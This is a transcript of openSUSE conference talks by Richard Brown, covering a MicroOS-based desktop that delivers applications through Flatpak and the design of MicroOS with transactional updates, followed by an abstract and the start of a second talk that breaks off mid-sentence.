Okay. To me again, different slide template this time, and actually a bit of a different presentation. Even though I'm talking about microOS, this isn't Richard the future technology team member where we work on microOS at SUSE. This isn't Richard the open SUSE chairman talking about this. This is Richard the crazy contributor who still just sometimes does weird stuff. In fact, so it's not official. This isn't like some future open SUSE plan unless we turn this into some future open SUSE plan. In fact, when I originally put this proposal in, the idea I had was I'm going to work on this crazy thing and Hackweek will have happened at SUSE. SUSE gives all of R&D a week to play on whatever they want. My assumption was Hackweek would have happened by now and I could talk about my Hackweek project at OSC. Hackweek is in three weeks' time, so I haven't done anything. But the session is still here. I decided to turn this into a bit more of a round table, a discussion session. Thing I say as I ramble on for the next half hour, so feel free to interrupt. Martin has a microphone, there's a microphone at the back. There's no script. Just like this idea is a construction site, this presentation is a construction site. Let's see where we end up afterwards. All of you at my microOS talk an hour ago, most of you. Okay, good. Just need that because I don't have to repeat half of that then. The basic thing I've been asking myself lately is what the hell to do about the Linux desktop. I want to believe that this is possible someday. Because this is one of the reasons why I got into Linux, to use a Linux desktop, to have that be the thing that I'm doing my work on, that I'm playing around on, that I do my gaming on. But it hasn't happened yet. Even when it does happen, there are being frank, desktop Linux is out there that are more popular than openSuser. That shouldn't be, but they are. So I've been kind of thinking of what are the problems that are really holding the desktop Linux world back. And there's kind of the obvious easy ones to blame. The fact that there are multiple distributions is part of the issue. There's lots of choices out there. That means some people are going to pick Ubuntu, some are going to pick Fedora, some are going to pick us. That makes it kind of hard to coalesce behind this single desktop idea. But then that idea doesn't really fly anymore either. Because we're not in this single Microsoft Windows world anymore. People are gaming on Macs, they're gaming on Android, they're playing around and doing stuff on Windows. Hey, they're running Linux on Windows these days. The kind of diversity of options aren't what, I can't believe that is what's holding desktop Linux back. So what is? And the thing that kind of really hits me is the lack, well, the fact that I think we as communities typically target ourselves and use stuff that we want to use and use it the way we want to use it. So we end up geeking around in tumbleweed because we like playing with operating systems and we do all this deep and dirty stuff in the operating system. So we don't want a polished, sanitized environment, let's say, for example, like OSX, where you can't do any of that fun stuff. But then it's really easy to get that one application, dump it on OSX and run. It's almost like we're living in totally different worlds. And those worlds are diverging in some respects. We're doing all this weird geeky, fast moving stuff and you're seeing these platforms like Windows and like OSX, getting in some respects more and more locked down and limited. Or in other words, they're doing it wrong. And I think there's lessons to be learned from that. Maybe it's because I'm getting older as well, but I don't want to be spending all of my time messing around with my laptop to make it work the way I want it to. It's nice that I can. It's nice that I can get under there and I can play around with the drivers and the kernel and stuff. But I just want to have a desktop which boots up and gives me a desktop environment and then I can dump the applications on top. So I've been kind of thinking of what's the perfect sort of hybrid of that approach. And in my day job lately, I've been working more and more micro-S. So like I talked about earlier, micro-S now being best described as a single service operating system. So you deploy it, it does that one thing. What if that one thing is just a desktop? And what if that desktop was a traditional open-suzer desktop? So something like, for example, no. So I actually messed around with this two hack weeks ago, so 2017, where we weren't talking about micro-S as much. I called it cubic desktop, but played with the idea there. Basically what I took there was the cubic installer we had at the time ripped out the container part because I wasn't going to do this with containers. And installed GNOME using transactional updates. So you install the system, you install transact, you install GNOME with, yeah, I think it was PKG in GNOME patterns, reboot. And I had a fully working GNOME desktop, even though it was a read-only root file system. So I couldn't mess around in anything in USR. I couldn't mess around with much in VAR because that was broken at the time. But the operating, the basic operating system worked perfectly fine. And it reminded me a lot of what you see on like a Chromebook now, where you didn't have to bother about messing around with the packages of the files, just messing around with too much of the configuration. It's just there. It just works. And then I messed around with the time Flatpak, like FlatHub had just launched. So I was using Flatpak to install my various different applications on top. And the idea was really cool. Basically the operating system part worked fine. It booted perfectly fine. It patched perfectly fine. I went to about three or four weeks of TumblrWeet snapshots. And at no point did anything ever go wrong. It always booted perfectly fine. It always got to the desktop fine. And besides the core Nome applications, things like the control panel and the terminal, there was not a single application on the system because I was using the basic Nome pattern for TumblrWeet. So I had to install apps from Flatpak. And about 35% of them worked, and the rest of them didn't, because at the time Flatpak was rather broken. But the general idea of Flatpak is a relatively good one. Not the best in the world, but basically taking this idea of a container, or a container like a RAM, which is a sandbox application. Having that sandbox application run, but unlike app image or other arrangements, you don't necessarily have the application and all of its dependencies bundled together in one single big blob. Because then you'd end up with all these applications being three or four gig in size. Because they basically have a mini operating system for every single app. With Nome, with Flatpak, you basically have these runtimes which are sandboxed containers full of the libraries that you're going to need for these various ecosystems that we have already in the Linux world. So like with KDE, there's a KDE runtime, there's a Nome runtime, there's an NVIDIA driver runtime. So basically remodeling what we currently do in RPMs into these sort of more globby groups, but these groups are the groups that people care about when it comes to desktop applications. Flatpak is very desktop application-oriented, which is one of the reasons why I'm still liking it more than, let's say, Snap with Ubuntu, where they've basically just reinvented packaging and created all of the problems we have with RPM and solved none of the problems we have with RPM and made some more issues because it's Ubuntu. Because Flatpak really from a desktop side does solve or does at least model the problem the way a desktop user thinks of the problem or way a desktop developer thinks of the problem. So basically you're developing an app on Linux now. If you're using a Nome stack, I can totally see Flatpak being the first thing they're going to expect. Because the runtimes are there, it's being handled by upstream Nome, build it, test it, ship it, all in GitLab because they've already pipelined all of that. And we're still doing our RPMs, but should we? Does it really make sense for OpenSuser to take upstream Nome's RPMs, upstream Nome's source, and build it again, test it again, ship it again just so we can say we've given you the desktop app? Our desktop apps really are core competency. We're really good at doing operating systems. But the desktop app, we typically just ship it, test it, check it in OpenQI and do it. The open question I have with this is basically can we make a whole bunch of problems we have with OpenSuser just disappear by offloading it to what's already happening upstream with Flatpak and Nome, for example? And then if it doesn't work out as well as it should, actually contributing. So after this all went horribly wrong, and I wrote this blog post and I said how horribly bad Flatpak was. I did feel a little bit guilty. So I went to Gwadek and I started talking with them. Basically we worked through most of the issues that were the root cause of these massive breakages. I haven't solved all of them, but the team there really have changed their build processes, they're testing things an awful lot more. I don't think they're using OpenQI despite my best efforts, but the quality of Flatpak has been improving. So yeah, I'm starting to get more comfortable with the idea of using Flatpak as the main way of delivering applications for my desktop. I don't know if it's going to be perfect, this is why, this is a hack week idea, I want to try this and see how far it goes, see where it goes wrong. And with that I kind of realized that I don't really know what I'm doing with a lot of this stuff. It's been a really long time since I've actually contributed directly to Nome, because I used to be in the Nome team, I'm in the Nome team, I used to package it all there, but it's moved on since 3, 2, which is the last time I packaged it heavily. And so with this idea I want to kind of see where the world currently is, and if anybody is really interested in this idea, what needs to be fixed where? Is this something where we need to fix OpenSuser to be more accommodating for Flatpak? Is this something where Flatpak just really do not know what they are doing and they need to learn how to build stuff properly, at least from an OpenSuser perspective? In which case, do we need to look at OBS, for example, building Flatpak better, or being part of that ecosystem there, or making things more complicated by doing things alongside it or the like? And nobody has interrupted me yet. Does anybody have any questions at this point? Still looking confused? No? Okay. Go on. My question would be, how would you solve the kind of the meta-packaging? You organize things into the right level of granularity, and how do you choose things that people actually want to have together? Is it your selection? Is it you provide a lot of fine-grained selections? Then how do you find things? It's the same problem you have with a bunch of RPMs, but it's one level up. Yeah. Well, it may be my naive approach, but when thinking like a modern, basic user, like with a phone or a tablet or a Chromebook, what do you get when you boot that thing up for the first time? You basically get the desktop or the UI, and a handful of basic applications, and the thing is pretty useless. Besides those basic applications, that kind of core functionality, you're on your own after that point, and then you're going to the app store or whatever and downloading everything individually that you want. So the idea I'd explore with this is would it make sense for the micro-S desktop, for example, to have nothing but micro-S, GNOME, maybe a subset of the GNOME applications to kind of give you that basic environment? So those would still be RPMs, and those would still be the traditional open-suzer stuff. And then from that point, we just say you're on your own, and using their flat-pack snaps or whatever, putting everything on top of that. Yeah, kind of go the sort of long-tail approach. That's where I, yeah. Which, yeah. What does anybody else think of that? There we go. Yeah. So I'm trying to compare this with the macOS world or the iOS world or Android, Chrome, whatever. In general, I think the basic model, take the OS, make the OS basically one big blob that is updated atomically, works really well. And Tumbleweed gives me a very similar experience to what I see on an iOS where I can trust the update and sometimes if it breaks, okay, next day there's a new one and it will fix that one breakage. That's all fine. And then everything else is an app store and you can get things from there. I don't think you necessarily have to make that core OS so small. If you, let's say, why not ship all the default apps as part of that, like Apple does it? You get a shitload of applications as part of the OS update. Because I mean, we are doing it well. I mean, those packages work in Tumbleweed. But yeah, everything that, you know, where you want to grow a community, want to have other people contribute, I think such an app store approach or, you know, a centralized build service where you can just put this stuff up and maybe it's untrusted, but, you know, they'll take care of distributing it. Makes perfect sense. The thought I have with that, one of the reasons I want to, well, there's two reasons why I want to push that bar, make the OS part as small as possible. One is like the thing I was talking about with micro s earlier, is the, with micro s being transactionally updated, you know, any update on that OS layer is going to need a reboot, which is a bit inconvenient. Plus, that's your scope of risk. That's the part where if that goes wrong, your system is not booting, things are broken, etc. So with micro s, we have lots of nice features for automatically rolling back if stuff goes wrong. So with this, I would see a model where you, you know, have it set up to automatically check is GNOME booting, has X, DM started properly, blah, blah, blah. If it doesn't, it would be better than Tumbleweed is because it would auto roll back and you would be on the previous snapshot. But that means if we put way too much stuff in there like LibreOffice, for example, even though our LibreOffice package is really, really good, you know, you're increasing that risk of introducing something that's going to break in that OS update. So there's, you know, I want to minimize that risk of breakage. At the same time, the question I kind of mentioned earlier of, you know, are we, is OpenSuser creating more work for itself than it needs? Do we really need to package LibreOffice? And I know that's a controversial question. And I'm not saying the answer is no, but I want to kind of use this as an excuse to kind of see if there is a yes to that question. Maybe we don't need to package LibreOffice and all these desktop apps. Maybe it's better to leave it in sort of the flat pack world and we just focus on the OS plumbing parts that, yeah, where people can't, we can't trust what random upstream stuff is actually giving us, maybe. Yes, sorry. Yeah, no problem. What I really like about this idea is if you do a cost benefit analysis of the amount of time that goes into integrating desktop packages currently and the amount of little glitches and stuff you have to fix every time upstream comes with a new version, that's an incredible amount of time that's not being spent on hardening the core operating system or making that more reliable. And from a security point of view, I am incredibly in favor of sandboxing any user-facing application anyway. As soon as I've done brilliant with UpArmor in the past, it's been one of the more usable hardening tools so far. For my point of view, if you just focus on stabling the core operating system instead of, well, in my opinion, misaligning time, fixing glitches in the front-end that will exist regardless of you batching at this round, I'd be much happier, especially also if you enable users to install their own apps like from flat pack. I think most here in the audience will recognize the pain in the, let's say, backside that is handling your mother-in-law's computer. If you could give her at least a little bit of freedom herself, that saves you all those Sunday afternoon trips backwards and forwards, which is also quite nice, although I even like my mother-in-law, but still. So yes, from my point of view, please carry on this route. This is basically whatever made Android the go-to platform on mobile, and even though they're doing a piece for your benefit, so please do it, right? And yeah, kudos for trying this. I'm maybe betraying my ignorance about flat pack here, but won't this end up with a lot of duplication of all your libnome, whatever, that is then in distributed multiple times in each pack, both on disk and in RAM, or is there now some kind of deduplication? The one reason I like flat pack more than some of the other options. So for example, there are other options for the application provider, like for example, app image, which you can actually build in OBS, which is, you know, Sam or can be sandboxed or snap, is flat pack has this model of the application and its run times. And the idea being there's a one to many mapping between that. So if you're building a known application, it's going to require the known run time, and that known run time should be the only place where there is, for example, libnome. So you know, a run time might require a couple of different, an application might require a couple of different run times. I think they also have run times requiring run times now just to make things fun. So there should be less of that duplication than you could potentially have with a containerized approach. It's still less efficient than what we're used to in the RPM world, because you're going to have, for example, as happens with like every major known release, you know, there's known 320, there's known 330, 332, if you're using the flat pack apps, you're likely to have a mix of known 330 based apps and known 330 based apps, so you have both run times and that's, you know, compared to a typical known open-source installation in Tumbleweed right now, that's like twice as much disk space. I mean, it's not lightweight. But disk space isn't that, you know, bad. You know, isn't that, you know, isn't that expensive these days and maybe that's a better model at least. I mean, heck, it's what our phones are all doing already. And second question, do you have an idea how to handle integration where, say for example, an application depends on some services provided by Nome like, I don't know, folks or other things that are on the bus that it expects the platform to provide? Back has an API for that, it's a name I conveniently just shot straight out of my head. Portals, that was it. Yeah, portals, so there's effectively portals plugged into Nome which provide sort of the API gateway for that kind of thing. The one that was the first, that was the file browser portal because otherwise you'd have all of these sandbox applications and you click on the, you know, like file open and it will load up the file view of the contained application which of course doesn't have any files in it and you can't see your home directory and that's kind of useless. So the file portal kind of gives you that route of looping through there and being able to kind of escape the container, the contained area for that purpose. When I looked at it two years ago, it was really limiting, it was really blousy but in those times since then, you know, more and more upstream developers are patching their stuff already to, so the upstream binaries include support for those portals and they're already doing this stuff, so they're already shipping the flat back. And that includes things like, like deba services that are, okay, cool. Hey. Imagine a staging project without LibreOffice and Firefox. How much faster they would build? It would be beneficial to open QA developers, well, to testers to have that stuff. That's actually a point I didn't thought of. Yeah. I mean, if this idea really has legs and we really find that this is a good way of doing an open-sueser desktop, so we get to the point where dropping Firefox out of Tumbleweed or dropping LibreOffice out of Tumbleweed is a sensible idea, yeah, the amount of speed we will get in Tumbleweed in terms of, yeah, development staging is astronomical. Yeah, that could be fun. I'm not so big use of open-sueser, but I mean, I have kind of radical idea. I mean, as a Java programmer, I'm always working with the Java programs and the user applications, I mean, maybe at some point it makes sense to collaborate with other distros in producing Java-based graphical user applications where it makes sense. And otherwise, maybe it makes sense, as you say, to drop some packages where your production will be increased, I mean, in building. So you don't want to have overhead, but still, I mean, how many packages currently you packaging, maybe more than thousands? Yeah, so in open-sueser right now, I think we're about 12,000 or maybe a bit higher packages. In staging, though, do we have a little bit of a break? Are you here? No. How many packages? Does anyone know how many packages are in staging? I've forgotten. So many. It's a couple of hundred, but it's a couple of hundred of really big, nasty ones. LibreOffice takes longer to build than most of the rest of the distribution put together. So yeah, that's where kind of killing, dropping some of those other packages might help. So I think this probably would make sense, but I don't know when some middle-sized companies kind of depending that you include some packages, maybe it's better just ask around of your from community make a poll to make sure that you don't drop package, which kind of have critical dependency on the other side. That's why I'm here. That's my point. That's why I'm repeating all this stuff. People can watch the video. I am expecting the Flame Wars to start on the mailing list. It's all good. Let's have that discussion and see where we go with this. None of this is set in stone. I totally admit I have no idea what I'm doing. So yeah, that's fine. So first of all, a bit of a radical idea on the business side. I think we may want to just ask ourselves, is building those packages really what customers would want to see from us? Or would the customer just be fine if he said, okay, it's built upstream, but we'll still help you if it breaks and we'll help you through the upstream build systems and the upstream distribution. So in the end, we provide the same service. Be a happy camper with your LibreOffice or whatever the contract is. The other thing we've mentioned it like when the D-Bus interfaces and so on, the critical thing to get right really is what is the contract between the OS and the application stack? Because that's, I mean, if you look at the phone systems, for example, there's a huge API that those applications can use so they don't have to take care of any of the sensors, some of the magic going on like the AI for voice detection and so on. That's all basically a huge set of APIs that the OS provides. And that makes the applications relatively small. I mean, they're still huge because they bundle in a lot of stuff. So that's really if the GNOME ecosystem or whatever gets that right, there's a fair chance that a Linux desktop could be a nice platform just like iOS or whatever. And it could be in many cases just HTML5 web apps with some local storage and all you need is basically a Chrome runtime. So rough show of hands. How many of you here would be interested in trying to use this if it existed? Cool. And how many of you are willing to help make it happen? Cool. Okay. That's fine. Cool. Okay, then. Does anybody have any more questions, thoughts? If not, I'll guess I'll have to start a mailing list for at least you can pick up your hands up. Oh, there's one. Sorry. Hello? Okay. What I'd like to say is from a user point of view, what about stability and security of these flat-packed packages? That'll be something which we will have to look at. So the assumption that I'm going into with this is this is being handled by upstreams mostly. So the way the flat hub ecosystem has kind of evolved, they're encouraging upstream developers to contribute directly to flat-hubs. So it's not like the relationship we have right now where we package and it doesn't matter. It should be upstreams doing most of that in their right away. So in theory, it should be more responsive to security updates. Should be at a relatively good standard and relatively good quality. So if something isn't good enough, you get to moan directly to the developer. So that might be a good thing. I'm not saying it's going to be better than the current. That's something this will have to find out. And that's actually something I worry about too will be users' expectations with that. Right now, you download OpenSuser, you know who to blame when it doesn't work. It's OpenSuser's fault. As long as you're not pulling stuff from a random OBS project. If you're pulling stuff from a main path, it's our fault. With this split, how do we make sure users know who to turn to when it doesn't work? How do we stop our bugzilla getting full of stuff about someone else's application? There's also another point. I see right now, I see inexperienced users as a target because you just have an OS. You just need to install one or two applications. And experienced users also who have their 10th or 20th device and don't want to set it up again. This is something that I do not see yet. The way OpenSuser is set up right now, disappearing with RPMs and having the ability to install any package you want or uninstall it again, like it's right now. I'm not suggesting we change the world overnight. No, no, no. I can see a possible future where we start dropping packages because they don't make sense anymore. I can also see, perhaps more soon than that, a possible future where we could end up segmenting that kind of stuff away. Let's imagine four or five years from now, we've come together and produced this thing and it becomes more popular as a desktop than Tumbleweed or Leap as a desktop. There would still be Tumbleweed and Leap, and maybe there would still be Tumbleweed and Leap as a desktop, but the micro-S desktop is the big one of the family. When we reached that point, I could see us potentially doing some fancy stuff like moving those legacy desktop packages, building them differently, not having them as part of staging, because there wouldn't be a core part of the distro anymore, so therefore they wouldn't be slowing staging down, therefore we'd start getting some of those build time benefits and stuff. Yeah, see where the road goes, but I'm not expecting this to change everything in no way. I like even Tumbleweed too much. How would you address bugs for FlatPacks? How would you address bugs for FlatPacks for basically for the desktop? How would you address bugs? Yeah, because it's not an open SUSE. Yeah. Like I said, that's kind of an open question. I don't have a great answer to. This is one of the things I would look at while we're doing this. Like, you know, it's, I mean, if I remember correctly, I'm a little bit rusty with Nome software because I uninstalled it from this machine. Yeah. But if I remember right, when you have Nome software configured with FlatPob, it does have a bug reporting link in there, because Nome software is basically looking like an app store, you know, it even has kind of the whole search and stuff. And when you're pulling it from our repos, you're getting all the RPM metadata and it's showing the bug reporting link being our bugzilla. And when you're getting it from FlatPob, I think the bug reporting link shoves it to some, probably the GitHub project for something somewhere. But so, you know, maybe it's just as simple as teaching users, that's where you go to file bugs about applications. Maybe it's more complicated than that. Yeah. But yeah. Or maybe we end up doing that as a service in the sense of open-suit of bugzilla models and that stuff. And we just have our bugzilla sending stuff to everybody else because we know where they are. So maybe that's something the community, the project still does because we want to make our life easier for our users. Yeah. So the letter was really what I was thinking about, you know, basically giving the customer the same guarantee or even the community user, but not necessarily having to do it in everything at SUSE with our own built resources. The other thing I think we should kind of think about is why can't we turn the layers around and say, okay, there is a very stable lockdown runtime, but just like now, even on a Windows 10 desktop, you can have a full Linux subsystem. There is still an RPM subsystem that you can use if you want to. And then that's a cool thing. You could have a LEAP-15.1 subsystem or you could have a stable subsystem on, I don't know, less 12 that you have to pay for. Yeah. But it's not necessarily bringing all those RPMs back to your platform. The platform is rock solid lockdown and yeah, transaction update and all those things. That's an interesting idea. Most of the runtimes are kind of orientated to a specific desktop stack, like the QT one and the No. They do have some runtimes which do get some use for more ornate applications which are kind of stupid, like the free desktop runtime, which is basically like an entire distribution bundled as a runtime. If we go down this road, which I think from the look of things, some of us are, and we really start getting kind of looped into this whole flatback stuff, I can see our way of thinking, meaning instead of, well, instead of in addition to like stuff like the free desktop runtime, yeah, a leap runtime and a tumbleweed runtime might make perfect sense to kind of slip in there for those non-known, non-KDE like uniquey weird stuff. So yeah, I could see that kind of thing falling out from this. Yeah. Any more questions? Yeah, Panos. I don't see that I will be a user of that. There are many points even pointed here, even from Haris, supported way or even, I don't see any point having this. I mean, if I want to use a container version of something, I don't need to open through the unsupported way of doing this. What I'm thinking as a use case is, speaking of myself, there were some times that I would like to have my development environment easy, and I'm thinking if you could have, for example, a micro-S, however you can call it, something that I can have in VM, somewhere in a cloud that is small enough so I don't pay much, but I can have, for example, my VS code running there as a desktop because you're talking about micro-S desktop, so I can have a remote desktop containerized in that case, which is small, so again, I don't pay much to do digital ocean or something like that, but in the same way, it gives me a very specific thing, so do one thing and do it well. In my case, let me develop GoLang apps, so something lightweight, something like that. So like a micro-S desktop with Podman? Some use cases like collect feedback from the community in that case, so yeah, something that I can run on my Raspberry, I don't want to have petabytes of different GNOME applications. I don't see any point in the ANK apart from just doing it once and then just going to the forums and saying, hey, look, I run the latest and greatest of stuff that, okay, that's it. So I don't see the containerizing a desktop use case. We're not talking about containerizing the desktop though. The desktop wouldn't be containerized. It's going to be a traditional installation on a bare metal or in a VM. Running normally, it'll be micro-S, so read-only root file system and locked down, but that's not containerized. The only containerized part potentially would be the user-facing applications. So in your case, where you want just a development environment, well, don't install any apps, then you're not going to have any junk there. You're going to get basically nothing more than a fast-booting system, because micro-S boots quickly, going straight into GNOME and giving you a terminal, and then you can do all your stuff in your terminal. So if you are containerizing only the apps, meaning that they can run everywhere, then why do you need an open-souser desktop to run them? Because if we do it this way, it's the best option out there, because all of our users can be really lazy. They just deploy their micro-S desktop. They never have to worry about patching it. They never have to worry about maintaining it. They just pick their apps and it keeps on rebooting all the damn time, because that's... See the Linux desktop for people who don't want to have to mess around with the desktop anymore. That's the problem. It's a desktop for non-desk-to-users. So... Cool. Two minutes left. And last question. Anybody? No. Cool. Thank you. I'll post on factory where the mailing list is going to be for this crazy idea then. Thanks. party emoji Nope.
Kubic with its MicroOS core is an exciting distribution that takes much of the cool stuff we're doing in Tumbleweed, adds solutions to the problems of updating a running system, and is becoming the perfect base system for running containers. But in openSUSE, running server stuff is only half the fun. Why should servers be the only platform enjoying automatic, atomic, "auto-rollbackable" system updates? Surely desktop users want to be lazy like server admins also? Can the tools and approaches implemented in MicroOS help create the desktop distribution of the future? Let's find out! This talk will introduce the concept of 'openSUSE MicroOS Desktop', a desktop focused variant of MicroOS based on Tumbleweed. Various ideas will be discussed, prototypes will be shown, and feedback will be expected from the audience to help shape this potentially exciting take on the future of openSUSE on Desktops.
10.5446/54419 (DOI)
Okay, then. Thank you all for coming. I'm Richard Brown. You know who I am. I'm going to be talking about micro-OS. To start, who here has heard the term micro-OS or cubic? Raise your hands please. Cool. I want you to forget everything you think you know about micro-S or cubic. When I was doing this presentation, I realised I could turn this into a history lesson of everything we've tried and what we were thinking a year ago and what we were thinking a year before that. And then I realised that would make a really boring presentation. So I'm doing my best here to describe what micro-S is today, where we're going today. And I'm therefore likely to say things which don't make any sense with your previous understanding. So, kind of, yeah, do you best to forget it, go with me. I will do my best to leave room for questions at the end so we can kind of bridge any gaps between then, now, where we're going. So the story for micro-S for me kind of actually starts with my story of computing. When I started with a computer, a Commodore 64 was my first machine, and it was a machine that could do one thing at a time. One cassette tape, yeah, put one cassette tape in, wait 20 minutes for it to load. If you want to do more than one thing, you need to have more than one Commodore 64 next to each other. And this is sort of where computing started before networking even, and that's where things started getting interesting later on. You know, with the PC, with networking, what did we all start doing? We started plugging them all together and building networks and using PCs and using laptops. And as we started doing that, the story in many respects became less about that one thing running on that computer, but what can all the things do when they're connected together? This became the era of the internet, and we had networking first and then the internet. And when you look at that, what comes as baggage with networked computing, you realise that you end up, it brings with it a certain pile of complexity. The more computers you have on a network, be it a WAN or a LAN or the internet, you need more infrastructure. More networking, more switches, more air conditioning. In businesses or even at home, the more hardware you have, it's harder to get that money, especially when it's big expenses and inside companies you always have the issue of capital expenditure versus operational expenditure. The more machines you have, the harder time you have with configuration management, keeping those machines running. You want to keep them all running kind of the same way, so we all end up with these wonderful shell scripts on our laptops or whatever to set up the machine exactly the way we want to do it. And of course you don't have to spend all of that time patching. So if you're thinking now, 90s, early 2000s, I used to be a system administration, what was lesson number one of system administration? Try and have as few machines as you need. Always try and minimise the amount of hardware you have in the data centre. Always try and minimise the amount of that additional complexity with your network because if you just keep on throwing machines at the problem, you're just going to bulk up that pile of baggage at the end. And so you end up with servers in particular running more than one service. The traditional kind of SUSE of the Lakes Enterprise, or many cases the traditional sort of open SUSE server, doesn't just do one job. It's a mail server, and a web server, and a database server, and something else. Because that helps cut down that infrastructure baggage, the connection tax sort of side of things. But that in itself ends up bringing more complexity. You may have less machines, but you still have this nasty configuration management problem because you've got to worry about the configuration of 20 different services on this one box. And they might be incompatible with each other. Try and run two versions of PostgreSQL on the same server at the same time. It's not going to be easy. Those machines are going to need to have more hardware, more RAM, more CPU individually. And a problem that I used to have a lot of the sys admin is what's described here is problem pooling. Everything individually works fine, and then one student does something really stupid on that Apache server with PHP and your entire infrastructure is broken because Apache ended up eating all the CPU, which then meant your database server stopped working, which then meant the cluster crashed, which then meant the HR system doesn't work anymore. The whole thing cascaded because you dumped it all on this one machine. So you couldn't just bundle everything onto less servers. And then of course the world's changed and we stopped talking about servers and data centers as much and started talking more about cloud. And part of the cloud story is this idea of making IT infrastructure more modular. Of splitting as much as possible, splitting those various services into the smallest sensible chunk, managing them in that chunk, and therefore ideally hopefully minimizing that problem of pooling problems together or complexity on an individual system. And this is the new world we're actually living in today. It's not just a case of cloud. You could say virtualization is part of this story. And generally speaking with virtualization, how many are doing lots of stuff with VMs on data centers, for example? So when you have a new service, what do you do? Do you add another service to an existing VM or do you just spin up a new VM? Both. Okay. But more and more you're probably spinning up more and more VMs. Especially with cloud unless you want to avoid having to spend too much money. Containers live this life. IOT live this life. And so more and more you end up with systems that are being deployed to just do one job. A single purpose system. Containing the minimum amount of service, minimum amount of binaries that needs to do that one job. In some cases, totally ignoring patching. Just deploy the thing in the cloud, run the thing, destroy it, deploy the new thing. And when you need to add more services, you add more VMs, you add more containers, you add more cloud answers, whichever poison you're using in this new world, the model is one that just encourages more and more installations of an operating system actually individually doing less and less. And that solves a little bit of the problem. The incompatibilities of running multiple versions of the same thing on the same machine goes away because you're not running multiple versions there anymore. The problem pooling goes away as well. But you're still left with the hardware requirements getting higher and higher the more you're putting on the bare metal. And you're left with configuration management, which is probably getting even worse. The more VMs you have, the more various installations you have around there. So to really solve the problem of the perfect operating system for this new world, for containers, for single purpose systems, it needs to have an answer for the configuration management problem. Minimising the possibility of the configuration of an operating system drifting, changing, and ideally have as little on there to be configured as possible. Because then if there's nothing there to configure, there's less there to go wrong. Patching, you need security updates, you need to be running the latest version of the right thing, and as much as possible that should be totally automated for obvious reasons. If it's automated, you don't have to worry about doing anything about it. The hardware requirements of that operating system should be minimised or optimised as much as possible to do that job. I just realised I talked about all of that without changing the slides. When we've been looking at that in our team, we ended up focusing on the configuration management and the patching side of things. As operating system engineers, we're looking at the best way of minimising the problems and mitigating the issues. At SUSE, we've been doing stuff with BTRFS since forever, and in SLEE we have Snapshot and Rollback. With that in context, we realised that the solution to those two problems really can be answered by this one champion solution in between of this concept of transactional administration. You want to minimise the configuration management requirements, you want to minimise the amount of patching you need to do, but you're still going to have to do something, you're still going to have to change something on a machine, you're still going to have to patch it, so you need to be in a position that if it's worth doing, if you're actually changing the configuration of a system, or changing the state of a system, you can undo it, that it can easily be rolled back to the last known working state. So any change should be transactionally applied, be in a way that's totally reliable, totally reproducible, and totally reversible, because any time there's changes, a chance something will go wrong. Of course, we also realised at this point that every CSI has this almost secret rule of they never want to touch a running system. To that, it's working. Don't touch it, especially on a Friday night, because if you deploy on a Friday night, you're going to work on Saturday. So, two years ago now, we introduced into the open-suser ecosystem this idea of transactional updates, which is an update, or a way of updating a system, using BTRFS and Snapper, but in a different way than the way you normally see it in open-suser and Leap, which is totally atomic. Basically, the change to the system happens in one single atomic operation. It either entirely happens or none of it happens. When it does happen, it happens in a way that isn't influencing the running system. The system is currently running, you're updating the file system in the background, but the files currently in use don't get touched, and then you flip from the current system to the new system on a reboot. Because it's all happening in one single atomic operation, and that's captured in a snapshot in BTRFS, it can be easily rolled back. Because it's actually happening at a reboot, it's also trivial at that point to test, has the reboot happened properly? Have all the services started up right? Is everything working the way it's meant to work? So, if it's not working the way it's meant to work, it's incredibly easy to just throw that snapshot away, reboot again, and get back to where you were. If you want to know more about transactional updates, there's another talk in here, 12 o'clock tomorrow, Ignace is doing it, talking about the state of transactional updates after the last couple of years of it being in OpenSuser, where it is, how we're using it. So, not going too much detail here. Admittedly, it's not all wonderful. We have some areas where we're trying to improve things. So, on Sunday, at 10 o'clock, also in here, Torsten is talking about some of the ideas we have for improving the situation of transactional updates with ETC. So, the whole kind of figuration management side of things, things are getting better, we're minimizing it, minimizing the problems. But there's some still there, and we could do with some suggestions or hearing some of ideas there. So, with this combination of basically using Sault and a read-only root file system, we're doing our best to solve that configuration drift problem. The idea with MicroRS, what we're basically doing is minimizing what you can change on the system at the same time using Sault. So, when you do change it, it's as standardized across all of your machines as possible. On top of that, we're using transactional updates. And on top of that, we're optimizing the footprint, not installing too much, not bundling a million files on there. So, of course, there's less things on the system, there's less things to go wrong. And when we originally started with MicroRS, we've always talked about it in the context of containers. But when you think about it, it's actually far more generic than that. It's a perfect operating system now for any sort of single-purpose deployment. Containers is one example, but a VM that's just doing one thing, or an IoT device, or something like that is the perfect... MicroRS perfectly fits that niche. It's a rolling release based on tumbleweed. In fact, we're building it totally as part of the tumbleweed project. So, we advertise it and talk about it as if it's a different distribution, but it's not a different code base. It's tested in the tumbleweed project, it's built in the tumbleweed project in OBS, and it's actually part of the tumbleweed release process. So, if tumbleweed breaks in a way... Or tumbleweed changes something that breaks MicroRS, then neither of them get shipped and vice versa. If MicroRS breaks something, which I admit I do probably a bit more often than I should, then I'm the reason tumbleweed doesn't have a snapshot that day. But that means, of course, if you're using tumbleweed, you know that quality, you know what we're doing there, and this is part of that same level of always usable. But of course, with the additional benefit, because we have transactional updates as the only way of doing it, in some respects, it's a safer version of tumbleweed to use because it can roll itself back if it all goes wrong. But I'm getting ahead of myself, I've got another talk about that later today. We've got various deployment options for MicroRS available now. So, we have a fully working tested DVD and NetISO with YAST. So, you can download it, boot up a system with it. You get a slightly optimised version of YAST, or workflow with YAST, than the typical tumbleweed installation. So, there's less screens, there's less steps, there's less things to ask for. But we've still kept a lot of options there on the summary screen at the end so you can really dig in, customise, add extra stuff because it's YAST, what's the point if we didn't give you that option? We also then have a bunch of these other things. Most of these are in some state of development. We have VM cloud images and pie images, based on what Fabriam was talking about, which are there, but still need a little bit more testing before they're officially part of the release process. We have YOMI, which is a method of installing MicroRS directly from SaltStack, or we'll have that very soon. For all of these images and the ways of deploying, we're using at the moment a combination of either cloud in it or soon ignition, for configuring the MicroRS system on first boot. If handling things like the network configuration, SSH keys, etc. So, the idea being you just deploy it, it boots up, it's ready to go, it's already running, you don't have to do anything else, just put your workload on top of it. YOMI, the Salt-based installer, is a really exciting part of that. You can come here, come to the gallery, to the other room, tomorrow at 3 o'clock, and Alberto is talking about that. So, I don't have to go into more detail here, which is nice, because otherwise I'll run out of time. With all of that put together, the question then becomes, what are you going to use MicroRS for when it's not just a container operating system now? So, some examples, sort of the obvious five, obviously containers, it's where we started. We started this MicroRS stuff playing around as a container operating system. But anything that's hosting a single service is a perfect use case for this. So, things like single service 